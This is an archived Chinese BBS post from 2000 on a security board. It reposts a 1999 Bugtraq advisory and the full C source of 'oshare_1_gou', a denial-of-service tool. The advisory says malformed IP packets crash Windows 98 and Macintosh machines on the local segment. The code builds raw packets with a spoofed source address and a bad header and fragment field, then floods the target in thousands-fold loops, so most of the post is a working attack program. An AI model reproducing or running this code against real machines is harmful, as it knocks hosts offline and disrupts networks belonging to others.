📄 330.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="331.htm">下一篇</a>]
<hr><p align="left"><small>发信人: cloudsky (小四), 信区: Security <br>
标 题: oshare_1_gou.c <br>
发信站: 武汉白云黄鹤站 (Mon Apr 10 11:52:07 2000), 站内信件 <br>
<br>
<br>
/* <br>
Date: Mon, 25 Jan 1999 15:38:43 +0900 <br>
From: DEF CON ZERO WINDOW <defcon0@UGTOP.COM> <br>
To: BUGTRAQ@netspace.org <br>
Subject: Win98 crash? <br>
<br>
<br>
Hi, <br>
<br>
Windows98 crashed by the packet which added a hand to the value of the <br>
IP header of the packet a little. (From now, the packet of this structure <br>
is called with "oshare packet".) Because it isn't familiar, I don't know <br>
what kind of error happens concretely inside OS to the inside of Windows. <br>
But, ihl and tot_len. Then, it guesses that crash will happen by the <br>
value of frag_bit&frag_off. <br>
<br>
But, because value is wrong, this "oshare packet" can't be transmitted <br>
to the outside of the network. This is here well, and it is here badly, <br>
too. But, even whose machine will be able to be killed in the same <br>
segment. <br>
<br>
Before someone improves this program, MicroSoft should take a <br>
countermeasure immediately. <br>
<br>
A Macintosh crashed by the "oshare packet" in the same way, too. <br>
But, it isn't realized by this program. It will be released soon. <br>
<br>
Reboot hangs freely if it becomes blue screen when Windows98 receives <br>
a "oshare packet". When blue screen comes out, the function of the <br>
network can't be used any more after it. The error of TCP/IP is started <br>
in the case of the Macintosh, and the function of the network can't be <br>
used any more. <br>
<br>
Is this phenomenon a bug? $B!3 (B( $B!-!<!. (B) $B%N (B <br>
<br>
<br>
<br>
Signed by R00t Zer0 <br>
------------------- <br>
*/ <br>
*/ <br>
<br>
<br>
/****************************************************************************/ <br>
/* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 -- */ <br>
/* */ <br>
<br>
/* */ <br>
/* */ <br>
/* */ <br>
/* This program transmits the "oshare" packet which starts a machine aga- */ <br>
/* in or crash. But, because it can't pass through the router, it can be */ <br>
/* carried out only in the same segment. */ <br>
/* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */ <br>
/* nged, it has already tested that it becomes possible to kill Mac, too. */ <br>
/* ----------------------------------------- */ <br>
/* Written by R00t Zer0 */ <br>
/* E-Mail : defcon0@ugtop.com */ <br>
/* Web URL : http://www.ugtop.com/defcon0/index.htm */ <br>
/****************************************************************************/ <br>
<br>
<br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <string.h> <br>
#include <unistd.h> <br>
#include <netdb.h> <br>
#include <sys/socket.h> <br>
#include <sys/types.h> <br>
#include <netinet/in.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/tcp.h> <br>
#include <netinet/in_systm.h> <br>
#include <arpa/inet.h> <br>
<br>
<br>
u_short in_cksum( u_short *, int ); <br>
int send_oshare_packet( int, u_long ); <br>
int send_oshare_packet( int, u_long ); <br>
<br>
<br>
u_short <br>
in_cksum( u_short *addr, int len ) <br>
{ <br>
int nleft = len; <br>
u_short *w = addr; <br>
int sum = 0; <br>
u_short answer = 0; <br>
<br>
while( nleft > 1 ) <br>
{ <br>
sum += *w++; <br>
nleft -= 2; <br>
} <br>
<br>
if (nleft == 1) <br>
{ <br>
*( u_char *)( &answer ) = *( u_char *)w; <br>
sum += answer; <br>
} <br>
<br>
sum = ( sum >> 16 ) + ( sum & 0xffff ); <br>
sum += ( sum >> 16 ); <br>
answer = ~sum; <br>
return( answer ); <br>
} <br>
<br>
<br>
<br>
<br>
int <br>
send_oshare_packet(int sock_send, u_long dst_addr) <br>
{ <br>
char *packet; <br>
int send_status; <br>
struct iphdr *ip; <br>
struct sockaddr_in to; <br>
<br>
packet = (char*)malloc(40); <br>
ip = (struct iphdr *)(packet); <br>
memset(packet, 0, 40); <br>
<br>
ip->version = 4; <br>
ip->ihl = 11; <br>
ip->tos = 0x00; <br>
ip->tot_len = htons(44); <br>
ip->id = htons(1999); <br>
ip->frag_off = htons(16383); <br>
ip->ttl = 0xff; <br>
ip->protocol = IPPROTO_UDP; <br>
ip->saddr = htonl(inet_addr("1.1.1.1")); <br>
ip->daddr = dst_addr; <br>
ip->check = in_cksum((u_short *)ip, 44); <br>
<br>
to.sin_family = AF_INET; <br>
to.sin_port = htons( 0x123 ); <br>
to.sin_addr.s_addr = dst_addr; <br>
<br>
send_status = sendto(sock_send, packet, 40, 0, <br>
( struct sockaddr *)&to, sizeof( struct sockaddr ) ); <br>
free( packet ); <br>
return( send_status ); <br>
} <br>
<br>
int <br>
main(int argc, char *argv[]) <br>
{ <br>
char tmp_buffer[ 1024 ]; <br>
int loop, loop2; <br>
<br>
int sock_send; <br>
u_long src_addr, dst_addr; <br>
u_short src_port, dst_port; <br>
<br>
struct hostent *host; <br>
struct sockaddr_in addr; <br>
<br>
time_t t; <br>
<br>
if(argc != 3) <br>
{ <br>
printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] ); <br>
exit( -1 ); <br>
} <br>
<br>
t = time( 0 ); <br>
srand((u_int)t); <br>
<br>
memset(&addr, 0, sizeof( struct sockaddr_in)); <br>
addr.sin_family = AF_INET; <br>
addr.sin_addr.s_addr = inet_addr( argv[1]); <br>
if(addr.sin_addr.s_addr == -1) <br>
{ <br>
host = gethostbyname( argv[1] ); <br>
if(host == NULL) <br>
{ <br>
printf( "Unknown host %s.\n", argv[1] ); <br>
exit( -1 ); <br>
} <br>
addr.sin_family = host->h_addrtype; <br>
memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length ); <br>
} <br>
memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 ); <br>
if((sock_send=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) <br>
{ <br>
perror( "Getting raw send socket" ); <br>
exit( -1 ); <br>
} <br>
printf( "\n\"Oshare Packet\" sending" ); <br>
fflush( stdout ); <br>
for( loop = 0; loop < atoi( argv[2] ); loop++ ) <br>
{ <br>
for( loop2 = 0; loop2 < 1000; loop2++ ) <br>
send_oshare_packet( sock_send, dst_addr ); <br>
fprintf( stderr, "." ); <br>
fflush( stdout ); <br>
} <br>
printf( "\n\nDone.\n\n" ); <br>
fflush( stdout ); <br>
<br>
close( sock_send ); <br>
exit( 0 ); <br>
} <br>
} <br>
-- <br>
我问飘逝的风:来迟了? <br>
风感慨:是的,他们已经宣战。 <br>
我问苏醒的大地:还有希望么? <br>
大地揉了揉眼睛:还有,还有无数代的少年。 <br>
我问长空中的英魂:你们相信? <br>
英魂带着笑意离去:相信,希望还在。 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="331.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -